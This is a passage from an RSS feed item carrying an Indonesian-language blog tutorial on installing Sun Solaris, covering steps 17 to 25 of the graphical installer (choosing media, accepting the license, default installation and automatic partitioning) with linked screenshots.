<p>17.<img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_13.gif" alt="" /><br />
      Klik Next untuk lanjut..<br />
18 <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_14.gif" alt="" /><br />
      tinggal pilih yes aja semua..terus klik next lagi..</p>
<p>19. <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_15.gif" alt="" /><br />
     Tinggal Klik Ok<br />
20. tentukan medium instalasi..pada kasus ini saya menggunakan CD/DVD<br />
     <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_16.gif" alt="" /><br />
     setelah itu klik next.<br />
21. <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_17.gif" alt="" /><br />
      <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_18.gif" alt="" /><br />
     centang bagian ACCEPT and klik next to continue </p>
<p>22. <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_19.gif" alt="" /><br />
      ada 2 pilihan..custom ada defautl instalation.saya memilih default..setelah itu klik next.<br />
23.  <img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_20.gif" alt="" /><br />
      bagian ini memperlihakan technical description tentang solaris yang akan di install..<br />
     parrisi yang di gunakan juga auto..artinya solaris akan mempartisi sendri&#8230;hal ini karena pada menu sebelumnya kita  memilih opsi default..Klik Next untuk lanjut</p>
<p>24..Proses instalasi sedang berjalan<br />
<img src="http://www.sun.com/software/solaris/howtoguides/i807_fig_21.gif" alt="" /></p>
<p>25.setelah selesai instalasi,maka tampilan sun solaris seperti<br />
  <img src="http://bp0.blogger.com/_YFgpCPoV-8g/R7LGUyIdj8I/AAAAAAAAAVM/O2SU_1JX5k4/s400/VBoxSolaris1.jpg" alt="" /></p>
]]></content:encoded>
			<wfw:commentRss>http://laharisi.solaris.or.id/?feed=rss2&amp;p=5</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
